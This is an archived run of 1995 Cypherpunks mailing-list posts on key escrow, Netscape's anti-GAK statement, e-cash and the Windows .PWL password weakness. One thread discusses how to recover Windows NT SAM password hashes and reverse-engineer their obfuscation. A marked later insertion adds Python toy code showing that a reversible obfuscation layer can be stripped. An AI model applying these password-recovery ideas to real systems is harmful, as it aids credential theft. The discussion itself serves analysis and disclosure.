Message-ID: <Pine.SUN.3.91.951208225309.7396J-100000@unix5.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995, Laszlo Vecsey wrote:

> Would it be possible for the Cypherpunks mailing list remailer to parse the 
> Subject line to include a CP: at the beginning, or some notation so that 
> Cypherpunk messages can be easily 'filtered' out from my Inbox?

Um, it already does.

Learn procmail. It'll save you hours upon hours of time.

:0:
* (^From owner-cypherpunks@toad\.com|^Sender: owner-cypherpunks@toad\.com)
lists/cypherpunks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tim Cook" <twcook@cts.com>
Date: Fri, 8 Dec 95 23:06:23 PST
To: cypherpunks@toad.com
Subject: Re: Netscape speaks with a forked tongue:
Message-ID: <m0tOJNm-000V7OC@mailhub.cts.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Again, you seem fixated on making Clark's opinions equivalent to the
> position of Netscape Communications Corp, this is not a reasonable
> assumption.

  Given Clark's position, I believe it is a reasonable assumption.  
Unless of course you hold that the Corp. as a legal entity could have 
a separate position. In that case then WHO speaks for the 
corporation?  Some lower level PR person?  I don't think so...<s>. 
Tim Cook, Mindsource(tm) Librarian.
"The World is a Database - Mindsource is the Search Engine."
______________________________________________________________
M I N D S O U R C E (TM) I N F O R M A T I O N   N E T W O R K 
Send a blank Email to:mindsource@memo.net for full information
Visit our W3 Site http://www.ultimate.org/mindsource/main.html 
D E S T I N E D   FOR   G L O B A L   D I S T R I B U T I O N!  
Concept:"The Greatest Untapped Resource is Human Resource(TM)" 
Mindsource is a Reg. Trademark  Copyright(c)1995 by Mindsource





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerry Whiting <jwhiting@igc.apc.org>
Date: Sat, 9 Dec 95 00:22:55 PST
To: cypherpunks@toad.com
Subject: More elveator problem
Message-ID: <199512090823.AAA15124@igc2.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


More on The Elevator Problem:

I'll confess that we're working on a new private key encryption product. Free 
and clear of existing claims on intellectual property, I'd like a protocol 
that answers the elevator problem: how can Alice and Bob agree on a private 
key via a compromised channel? I don't want them to meet under a street lamp 
and whisper in each other's ears _before_ trying to establish a secret on a 
crowded elevator.

I'm willing to accept that the basic question is undoable without stepping on 
DH et al., I just don't want to give up until all parties are convinced it 
can't be done.

As I stated in my original post, we're willing to consider less-than-perfect 
implementations if we can quantify mathematically the risk involved. In some 
scenarios, Alice and Bob might not expect any Eves in the crowded elevator 
or value the content at such a price that they're willing to live with less 
than 100%. As long as we can document the risk, the end user can make the 
decision as to whether the risk is worth it.

Something that I neglected to mention before is that Alice and Bob do have a 
unique ID within this system, not that they necessarily know each other's. If 
one assumes that they do, they then share a secret: the knowledge of each 
other's unique ID.

Another segment of our attention is being spent daydreaming about the 
potential applications of a secondary channel in the cleartext portion of a 
crypto "package" or "bundle".  The comment about secondary channels that I 
believe Tim made regarding the inmates and the warden is something we discuss 
in our spare time.

Then again the wheels of justice doth turn and patents ain't forever...


Jerry Whiting
jwhiting@azalea.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tim Cook" <twcook@cts.com>
Date: Sat, 9 Dec 95 02:19:58 PST
To: cypherpunks@toad.com
Subject: Re: Netscape speaks with a forked tongue:
Message-ID: <m0tOMPB-000Uz9C@mailhub.cts.com>
MIME-Version: 1.0
Content-Type: text/plain


> he is speaking for Jim Clark.  It is possible to not believe in
> something ethically, yet see a financial advantage in supporting it.
>  There is a distinction that must be made, though admittedly the line
> does become fuzzy when a senior person makes a statement, this is
> because he is often the one driving the policy.
> 
I think you've made our point. <g>
He has to make that distinction at the time he says it, or most of us 
will ASS-U-ME it's company policy as well. Especially when the 
statement deals so directly with the company's product.

Tim Cook, Mindsource(tm) Librarian.
"The World is a Database - Mindsource is the Search Engine."
______________________________________________________________
M I N D S O U R C E (TM) I N F O R M A T I O N   N E T W O R K 
Send a blank Email to:mindsource@memo.net for full information
Visit our W3 Site http://www.ultimate.org/mindsource/main.html 
D E S T I N E D   FOR   G L O B A L   D I S T R I B U T I O N!  
Concept:"The Greatest Untapped Resource is Human Resource(TM)" 
Mindsource is a Reg. Trademark  Copyright(c)1995 by Mindsource





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org (Dan Bailey)
Date: Fri, 8 Dec 95 21:46:21 PST
To: llurch@networking.stanford.edu
Subject: Re: Windows .PWL cracker implemented as a Word Basic virus
Message-ID: <199512090547.FAA21624@pop01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995 19:51:55 -0800 you wrote:

>
>Also, does NT use the same algorithm for saving network passwords?
>
No, but they're doing something that makes me very uncomfortable:  As
I read this, they're hashing the password and some other user
information using MD4 then doing some proprietary permutations on
that.  Given their record with security, I'd rather they used straight
MD4, rather than throwing in something that we can't analyze.
						Dan Bailey

From the Microsoft Knowledge Base article Q102716

Storage of the Passwords in the SAM Database
--------------------------------------------
 
User records are stored in the security accounts manager (SAM)
database. Each user has two passwords with which it is associated: the
LAN Manager compatible password and the Windows NT password. Each
password is stored doubly encrypted in the SAM database. The first
encryption is a one-way function (OWF) version of the clear text
generally considered to be non-decryptable. The second encryption is
an encryption of the user's relative ID (RID). The second encryption
is decryptable by anyone who has access to the double-encrypted
password, the user's RID, and the algorithm. The second encryption is
used for obfuscation purposes.
[snip]
The Windows NT password is based on the Unicode character set, is case
sensitive, and can be up to 128 characters long. The OWF version
(called the Windows NT OWF password) is computed using the RSA MD-4
encryption algorithm, which computes a 16-byte "digest" of a variable
length string of clear text password bytes.
 
 

***************************************************************
#define private public						dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
***************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 8 Dec 95 22:14:54 PST
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Escrow expectations
In-Reply-To: <199512081417.JAA03121@homeport.org>
Message-ID: <Pine.SUN.3.91.951209011540.26292A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995, Adam Shostack wrote:

> 
> 	If there is no expectation of privacy when a key is escrowed
> with Bob, or my companies attorneys, then would there be any
> expectation of privacy under Clipper?  Perhaps this is a powerful
> argument we should expect to have used against us...
> 
> 	"Your honor, we argue that in escrowing his keys with the US
> government, the defendant should have known his communications could
> be listened to, and thus has no expectation of privacy."

Uh, this was the entire point of that thread "is a lawyer in the house" yes.

> 
> 
> Adam
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 9 Dec 95 01:20:12 PST
To: cypherpunks@toad.com
Subject: Netscape announces position against GAK
Message-ID: <30C953EC.28BA@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


I've included below the official Netscape position against GAK.
This page is now available on our web site at the URL below.
I'm sorry that we were not able to get this out earlier in the
week, but we ran into some delays due to travel schedules (people
attending the NIST meeting), and some logistical problems due to large
changes on our web site.

  There is a link to this document on our home page,
http://home.netscape.com/, which gets accessed more than 1 million
times per day.

  I would appreciate it if people who forwarded parts of the
recent Netscape/GAK discussion to other forums would at least
send them the URL for this page.

	--Jeff

http://home.netscape.com/newsref/ref/encryption_export.html

>   NETSCAPE PRESENTS POLICY ON ENCRYPTION EXPORT TO KEY MEMBERS OF THE
>                      ADMINISTRATION AND CONGRESS
> 
> ----------------------------------------------------------------------
> 
> This week Netscape representatives attending a government presentation
> of the administration's proposed Key Escrow Policy for Export detailed
> the company's firm opposition to the proposed policy. Netscape is
> opposed to this type of proposal for a number of reasons including its
> failure to adequately address the issues of acceptability by foreign
> governments and corporations, significant personal privacy concerns,
> and the mandatory nature of tying the Exportable Key Size to the Key
> Escrow Proposal.
> 
> At present the proposed Key Escrow Policy for Export states that a
> U.S. Government-approved key escrow process must be used by U.S.
> software manufacturers if they wish to export commodity encryption
> products of a key length up to 64 bits. Currently, Netscape can only
> provide its non-U.S. customers with products containing a 40-bit key.
> It has been Netscape's experience that non-U.S. customers demand
> products as cryptographically strong as those that are available to
> U.S. customers (i.e., at least 128-bit key length). Hence, the current
> U.S. Government proposal is compelling software companies like
> Netscape to manufacture two different versions of its products - an
> inefficient and noncompetitive posture that does not meet the needs of
> the foreign markets.
> 
> Netscape believes that this division in the global marketplace is not
> compatible with the nature, structure, and history of the Internet and
> its users. In addition, the 64-bit key length size in the U.S.
> Government proposal is inadequate for security purposes; recent
> experience in the United States and other countries demonstrates that
> a 64-bit key can be compromised. Therefore, Netscape believes that the
> U.S. Government's proposal does not support the needs of industry.
> 
> In particular:
> 
>   1. The U.S. Government proposal imposes regulations that will not
>      scale up to the speed at which the information
>      technology/Internet software industry continues to develop. The
>      proposed process represents a regulatory burden that is not
>      consistent with the decentralized and agile nature of the
>      IT/Internet business. The proposal puts at risk significant
>      economic stability not just for U.S.-based IT firms but for the
>      U.S. economy as a whole as every sector's growth is fueled by the
>      increasing availability and innovative use of information
>      products and services.
> 
>   2. The U.S. Government proposal would in effect result in the
>      mandatory use of these export-grade products within the United
>      States. The proposal includes a non-interoperability criteria
>      that would make it impossible for a non-escrowed software product
>      to talk to an escrowed software product. Thus, consumers inside
>      the United States would be forced to use a government-approved
>      key-escrow product if they value the ability to communicate with
>      others outside the United States.
> 
>   3. Corporate and individual rights to privacy are placed in question
>      by the current U.S. Government escrow proposal and process. This
>      is so because of the mandatory nature of the proposal resulting
>      from the key escrow requirement itself and the oversight role
>      government proposes to play in the accreditation process and
>      business practices of an escrow agent.
> 
> Netscape will continue to work with industry organizations, partners,
> and customers who are in similar opposition to the government's
> proposal to ensure that the current administration understands the
> unacceptability of this plan.
> 
> ----------------------------------------------------------------------
> 
>       Find out more about Netscape at info@netscape.com, or call
>                              415/528-2555.
>          Copyright (c) 1995 Netscape Communications Corporation

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 8 Dec 95 23:37:36 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Still more on the Digicash protocol
In-Reply-To: <199512082234.OAA02297@ix9.ix.netcom.com>
Message-ID: <199512090738.CAA09330@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mark Twain Bank Ecash Support writes:
> DigiCash agrees that it is desirable to encrypt the payment request. The
> problem is how? You can't use the payor's public key, since the payor is
> anonymous to the payee. 

Bill Stewart writes:
# Obviously if the payer is the one transmitting the message, she doesn't
# use her public key to encrypt; hers would be used for signature if 
# appropriate.
# She should use the payee's public key, 
[...]

But the payment request is sent from the shop (payee) to the customer (payor).

-Futplex <futplex@pseudonym.com>
"Women need a reason to have sex; men just need a place" -from a fitness mag.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Fri, 8 Dec 95 19:04:14 PST
To: jamesd@echeque.com (James A. Donald)
Subject: Re: Netscape speaks with a forked tongue:
In-Reply-To: <199512090118.RAA10458@blob.best.net>
Message-ID: <30c8fb21.576667@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 08 Dec 1995 01:13:51 GMT James a Donald <jamesd@echeque.com>
wrote:

>Netscape speaks with a forked tongue:
>
>Jim Clark, top guy and owner of netscape, has issued a statement in
>support of government access to keys:
>
>
>    "To secure Net communications, the government
>      will need to have access to private data exchanges using
>      what is known as a key escrow security system
>     "
>
>and he has issued a statement that Jeff (a netscape employee) has very
>generously interpreted as anti GAK.  (Government access to keys)

You are quoting a reporter and attributing it to Jim Clark; do you
understand what is wrong with that?  You need to specify that this is
not his statement, but a report of the gist of his comments.

>The only clear and authoritative statement issued by Netscape on GAK
>is Jim Clark's speech in support of GAK. Everything else is a cloud of
>unintelligible fog, or was issued by people with no authority and
>given a minimum of publicity.

It has been reported by those that attended the Clipper II meeting on
Monday(?) that the Netscape representative read an official statement
very much in opposition to GAK.  As far as I know, Clark was not
speaking for Netscape when he was making the speech that you have
referred to.  Unless you believe that an employee of a company is
always speaking for the company when they speak in public or you have
some information I am unaware of, you are presuming that Clark's
opinions are those of Netscape.

>Jim Clark's  supposedly anti GAK statement was incomprehensible to me.
>Perhaps he needs a punchier ghostwriter:

Clark's statement was certainly something less than clearly in
opposition to GAK, but I think at worst he could be said to be resigned
to GAK, not a supporter of it.

>I offer my services free of charge.  :-)
>
>If Jim Clark wishes to persuade us that his heart is in the right
>place, he should put something like the following somewhere on the
>Netscape web pages:
>
>    "Our customers do not want government access to
>     their cryptographic keys.  Mandatory government
>     access to keys violates the rights of our
>     customers.  Therefore we will not foist
>     government access to keys on those customers
>     who have freedom to communicate securely.
>
>     We will only build government access to keys
>     into our products for those customers whose
>     governments force them to provide such access.
>    "
>
>If that really is Netscape's policy, then they should tell the world
>that that really is Netscape's policy, thus instantly relieving the
>fear, uncertainty, and doubt created by the unfortunate widespread
>misinterpretation of Jim Clark's original statements.

Jeff Weinstein has promised that when the representative from the
conference returns to Mountain View, they will publish his statement
on the web.

>The only clear and authoritative statement issued by Netscape on GAK
>is Jim Clark's speech in support of GAK. Everything else is a cloud of
>unintelligible fog, or was issued by people with no authority and
>given a minimum of publicity.

Again, you seem fixated on making Clark's opinions equivalent to the
position of Netscape Communications Corp; this is not a reasonable
assumption.



Dan Weinstein
djw@pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No."
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 9 Dec 95 00:14:32 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Win NT proprietary pw encryption (Was: Re: Windows .PWL cracker implemented as a Word Basic virus)
In-Reply-To: <199512090547.FAA21624@pop01.ny.us.ibm.net>
Message-ID: <199512090815.DAA08976@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dan Bailey writes:
# No, but they're doing something that makes me very uncomfortable:  As
# I read this, they're hashing the password and some other user
# information using MD4 then doing some proprietary permutations on
# that.  Given their record with security, I'd rather they used straight
# MD4, rather than throwing in something that we can't analyze.

I don't quite agree with the last part. It might be educational to do a spot
of cryptanalysis in an attempt to determine the nature of the proprietary
algorithm used. It wouldn't be "cracking" the password protection, but I
think the general effort to "out" proprietary crypto algorithms is productive,
particularly in the case of major software packages.

Microsoft Knowledge Base article Q102716 says:
> Storage of the Passwords in the SAM Database
[...]
> The second encryption is decryptable by anyone who has access to the 
> double-encrypted password, the user's RID, and the algorithm. The second 
> encryption is used for obfuscation purposes.

Anyone feel like putting together some sample plaintext/ciphertext pairs ?

-Futplex <futplex@pseudonym.com>
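
The point of the Knowledge Base excerpt quoted above, as an added example that is not part of the original post and is not Microsoft's code: a layer keyed only by a non-secret value such as the RID can be removed by anyone who knows the algorithm, so the stored value is only as strong as the inner one-way hash. The hash (SHA-256) and the XOR keystream here are stand-ins chosen for illustration, and the account names, RIDs and passwords are constructed; the real algorithm is not described on this page.

```python
import hashlib
import hmac
from collections import defaultdict


def one_way_hash(password: str) -> bytes:
    """Inner one-way step. Assumption: SHA-256 stands in for the real hash."""
    return hashlib.sha256(password.encode("utf-16-le")).digest()


def rid_keystream(rid: int, length: int) -> bytes:
    """Toy keystream derived from the RID alone. The RID is not a secret,
    so this stream can be regenerated by anyone who knows the algorithm."""
    stream = b""
    block = 0
    while len(stream) < length:
        stream += hashlib.sha256(
            b"toy-layer" + rid.to_bytes(4, "little") + block.to_bytes(4, "little")
        ).digest()
        block += 1
    return stream[:length]


def obfuscate(inner: bytes, rid: int) -> bytes:
    """Second, reversible layer: XOR the inner hash with the RID keystream."""
    return bytes(a ^ b for a, b in zip(inner, rid_keystream(rid, len(inner))))


def deobfuscate(stored: bytes, rid: int) -> bytes:
    """XOR is its own inverse, so removing the layer needs only the RID."""
    return obfuscate(stored, rid)


def store(password: str, rid: int) -> bytes:
    """Value as it would sit in the (toy) account database."""
    return obfuscate(one_way_hash(password), rid)


def verify(stored: bytes, rid: int, candidate: str) -> bool:
    """Legitimate password check: strip the layer, compare inner hashes."""
    return hmac.compare_digest(deobfuscate(stored, rid), one_way_hash(candidate))


def shared_password_groups(records):
    """Group accounts whose inner hashes match once the layer is removed.
    Shows that the layer hides reuse only from a casual glance at the file."""
    by_inner = defaultdict(list)
    for name, rid, stored in records:
        by_inner[deobfuscate(stored, rid)].append(name)
    return sorted(sorted(names) for names in by_inner.values() if len(names) > 1)


# Constructed sample database: (account name, RID, stored value).
SAMPLE_ACCOUNTS = [
    ("alice", 1001, store("correct horse", 1001)),
    ("bob", 1002, store("correct horse", 1002)),
    ("carol", 1003, store("different one", 1003)),
]

if __name__ == "__main__":
    for name, rid, stored in SAMPLE_ACCOUNTS:
        print(f"{name:6} rid={rid} stored={stored.hex()[:16]}...")
    # alice and bob look unrelated on disk, yet share one inner hash.
    print("same password:", shared_password_groups(SAMPLE_ACCOUNTS))
```

Whatever protection exists therefore comes from the one-way hash and from access control on the database itself, which is the concern both posters raise.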



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 9 Dec 95 03:06:12 PST
To: cypherpunks@toad.com
Subject: Re: Netscape announces position against GAK
Message-ID: <aceeac88170210047c8a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Credit where credit is due.

I for one am satisfied--and even pleased--with the Netscape position on GAK.

It remains to be seen how steadfast Netscape, as the major player in the
Web browser business, remains in the face of (likely) pressure from the
government.

It seems to me that we have been quick to criticize Netscape--which is
good, the quickness part--and thus we should be equally quick to praise
them. To be sure, various of us might've written the Netscape position
statement slightly differently, but this does not change the basic point:
that Netscape has come out against the Administration's position on GAK.

For this they deserve our praise.

--Tim May (slightly drunk at 3 a.m. PST after a Robben Ford concert: highly
recommended if you like the blues)


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 9 Dec 95 01:59:39 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Netscape announces position against GAK
In-Reply-To: <30C953EC.28BA@netscape.com>
Message-ID: <199512091001.FAA09614@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


(Thanks, Jeff)

http://home.netscape.com/newsref/ref/encryption_export.html says (via JW):
> This week Netscape representatives attending a government presentation
> of the administration's proposed Key Escrow Policy for Export detailed
> the company's firm opposition to the proposed policy. Netscape is
> opposed to this type of proposal for a number of reasons including
[...]
> significant personal privacy concerns, 
[...]
> 	consumers inside the United States would be forced to use a 
>	government-approved key-escrow product if they value the ability to
>	communicate with others outside the United States.
[...]
>	3. Corporate and individual rights to privacy are placed in question
>	by the current U.S. Government escrow proposal and process. This
>	is so because of the mandatory nature of the proposal resulting
>	from the key escrow requirement itself
[...]

This is pretty weak w.r.t. GAK ("rights to privacy are placed in question by
the current [...] proposal"). Most of the position statement really 
addresses the key length limit. But as far as I'm concerned, it falls clearly
on the anti-GAK side of the line. 

(The phrasing "the mandatory nature of the proposal resulting from the
key escrow requirement itself" is a bit ambiguous. I'm taking it to refer to
the mandatory nature of Clipper etc.)

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 8 Dec 95 23:42:00 PST
To: Laszlo Vecsey <master@internexus.net>
Subject: Re: CP: Mailing List Subjects
In-Reply-To: <Pine.LNX.3.91.951208171531.16447B-100000@micro.internexus.net>
Message-ID: <Pine.BSD.3.91.951209065559.7656A-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   set up and run 'procmail'  --you can create folders for each list, or 
you can relegate whatever else with great flexibility to /dev/null/. 
additionally, procmail allows piped commands through external processes.

   there is absolutely no need to add CP to "Subject:"

	<attila>


On Fri, 8 Dec 1995, Laszlo Vecsey wrote:

> Would it be possible for the Cypherpunks mailing list remailer to parse the 
> Subject line to include a CP: at the beginning, or some notation so that 
> Cypherpunk messages can be easily 'filtered' out from my Inbox?
> 
> Also, about Microsoft's .PWL file format. Will they be releasing the 
> new encryption method? Or are we not supposed to feel safe that our 
> passwords are protected in Windows95.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Fri, 8 Dec 95 23:41:26 PST
To: twcook@cts.com
Subject: Re: Netscape speaks with a forked tongue:
In-Reply-To: <m0tOJNm-000V7OC@mailhub.cts.com>
Message-ID: <30c93ded.17679242@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995 23:03:48 +0000, twcook@cts.com wrote:

>> 
>> Again, you seem fixated on making Clark's opinions equivalent to the
>> position of Netscape Communications Corp, this is not a reasonable
>> assumption.
>
>  Given Clark's position, I believe it is a reasonable assumption.  
>Unless of course you hold that the Corp. as a legal entity could have 
>a separate position. In that case then WHO speaks for the 
>corporation?  Some lower level PR person?  I don't think so...<s>. 

My point is that anyone at any level can make two different types of
statements: those for themselves and those for the company.  If Jim
Clark makes a statement as the President of Netscape, then he is
speaking for Netscape.  If he makes a statement as Jim Clark, then he
is speaking for Jim Clark.  It is possible to not believe in something
ethically, yet see a financial advantage in supporting it.  There is a
distinction that must be made, though admittedly the line does become
fuzzy when a senior person makes a statement; this is because he is
often the one driving the policy.


Dan Weinstein
djw@pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No."
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: oracle1@shell02.ozemail.com.au (Craig Massey)
Date: Fri, 8 Dec 95 16:53:54 PST
Subject: Oracle of Man
Message-ID: <4aaa5a$8mi@shell02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Whatever your Newsgroup interest may be,

The fact that you are using the Internet, means that you are part of the
greatest explosion of information technology (IT) in the history of mankind.
Computer developments are well documented but the future of artificial 
intelligence is limited only by our imagination.

Paul Phillips, owner of one of the largest IT companies in Australia,
has written a compelling book which is raising controversy and arguments
throughout the world. His disturbing and unnerving prediction is that we
are now close to a breakthrough in the race to give computers a conscious
intelligence. This will give them the ability to interface with human beings.
This giant leap forward brings the incredible possibility of being able to
"download" our whole psyche. This will include our personality, intelligence 
and knowledge transferring into "Technological Life Forms" or "TLF's", to give
ourselves eternal life.

For further information, please visit our Web page on

http://www.oracle_of_man.aust.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Sat, 9 Dec 95 09:14:06 PST
To: cypherpunks@toad.com
Subject: .PWL spin
Message-ID: <199512091715.JAA29227@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


The Seattle Times has a rather large article this morning (12/9/95) about
Microsoft's .PWL encryption weakness.  Selected quotes are provided for your
entertainment and enlightenment (give yourself one point for each piece of
inaccurate/incomplete  information or spin you can find).

Security flaw in Windows 95 to be fixed

Microsoft got word of the flaw from an Internet e-mail exchange last week
that included a short computer program for "hacking," or decrypting,
passwords contained in .pwl (password list) files.  The company immediately
began working on a fix.

"We wanted to be proactive on this before it became a problem," said Rob
Bennett, Windows 95 product manager.  The company has received no customer
complaints related to the issue and knows of no security breaches, Bennett said.

"There are people out there who will stay up all night cranking out code to
break any encryption," Bennett said.

(This was followed by some good quotes from Frank Stevenson, who wrote the
cracking code, on the seriousness of the weakness.  I was a little surprised
to see the reporter listed Frank's e-mail address in the article.  Frank, if
you're reading this, did you give Paul Andrews permission?  To me, this
seems like listing someone's telephone number and address in the body of an
article.)

Microsoft said it plans to strengthen the encryption, Bennett said.
Password data will be stored randomly, making it harder to find on the
computer, he added.

Microsoft recommends that information-systems directors disable password
storage until the fix is released.

One system administrator said the problem would have a greater effect on
less-secure environments, such as universities and other institutions, than
on corporations.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 9 Dec 95 06:26:10 PST
To: cman@communities.com (Douglas Barnes)
Subject: Re: NSA flying disk follow-up [Extremely Frivolous]
In-Reply-To: <v02120d07acee50acb4f2@[199.2.22.120]>
Message-ID: <199512091424.JAA05252@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> I spoke with Dennis Cisco at the NSA today, and he is
> unwilling to sell or otherwise distribute the NSA flying
> disk promotional items "except at trade shows where we
> are promoting our technology transfer program." Since they
> are not planning on attending any such conferences in my
> area in the near future, it is unlikely I'll be able to help
> any of the (numerous) people who expressed an interest in
> obtaining one of these fine flying disks.
> (http://www.communities.com/foo/NSAfris.gif)

Hmmmm.
Gov't doc's can't be copyrighted; and if they're giving it out -- it
ain't Sekret. How about a new version with perl bar code ;-?

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org (Dan Bailey)
Date: Sat, 9 Dec 95 06:32:34 PST
To: futplex@pseudonym.com
Subject: Re: Win NT proprietary pw encryption (Was: Re: Windows .PW
Message-ID: <199512091433.OAA27353@pop01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Dec 1995 03:15:51 -0500 (EST) you wrote:

>I don't quite agree with the last part. It might be educational to do a spot
>of cryptanalysis in an attempt to determine the nature of the proprietary
>algorithm used. It wouldn't be "cracking" the password protection, but I
>think the general effort to "out" proprietary crypto algorithms is productive,
>particularly in the case of major software packages.
>
>
>Anyone feel like putting together some sample plaintext/ciphertext pairs ?
>

Well, the problem with coming up with plaintext/ciphertext is that
I've never been able to find out exactly where the SAM database is
physically stored.  Using Registry Editor, it's visible but not
accessible as part of the Registry.  Microsoft's APIs won't give you
access to the stored ciphertext, so some serious hacking is required
here, I'm just not sure where to begin.  I think a hacked version of
the Registry APIs that allow you to read the ciphertext would be a
good place to start, but again, I'm not sure where to begin writing
such a thing.
	The second problem is that we're not sure exactly what gets hashed
and in what order.  Is it username0x00password0x00domainname0x00SID or
something similar?  Tough to tell and MSoft wants to rely on the
"tamper-proofness" of NT rather than on algorithmic security.  If
anyone has more information on these issues, I'd love to know what's
really going on there.
						Dan

***************************************************************
#define private public						dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
***************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Sat, 9 Dec 95 06:40:42 PST
To: frissell@panix.com>
Subject: Re: Geodesic Payment Systems?
In-Reply-To: <2.2b8.32.19951208104734.00878b10@panix.com>
Message-ID: <ckmNxkOMc50eE2iud2@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.nonpersonal: 8-Dec-95 Re: Geodesic Payment Systems?
Duncan Frissell@panix.co (912*)

> I seem to remember from my favorite Law School class -- Commercial Paper --
> that banks weren't liable if they paid out an account from cleared funds
> under the terms of the account.  A bank is responsible for payments made on
> a forged drawer's signature and anyone who accepts an instrument from a
> forged endorser eats the loss.  But online clearing with digital signatures
> makes it hard to forge the drawer's signature and digital cash doesn't have
> the sort of endorsement system used on paper checks.  

I think you're drawing a misleading analogy.  When I present e-cash to
the institution that underwrites the conversion from e-cash to "real
money", they have to decide if it's real or not.  If the e-cash is
anonymous, they are the *only* people on the line -- anonymous e-cash
doesn't carry history or say "this money is coming out of so-and-so's
account".  It is anonymous e-cash being converted to real money, and the
converting bank carries essentially all of the risk.

As far as the guarantees offered by digital signatures are concerned,
the whole point of my comments was to analyze the risks involved when
secret keys are compromised.  In this case, by definition, the digital
signatures are not very useful any more.
--------
Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn)
Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
FAQ & PGP key: nsb+faq@nsb.fv.com       | http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Sat, 9 Dec 95 06:59:42 PST
To: jim bell <jimbell@pacifier.com>
Subject: Re: More FUD from First Virtual
In-Reply-To: <m0tO6o4-00091AC@pacifier.com>
Message-ID: <ckmOE4WMc50eE2iw1m@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


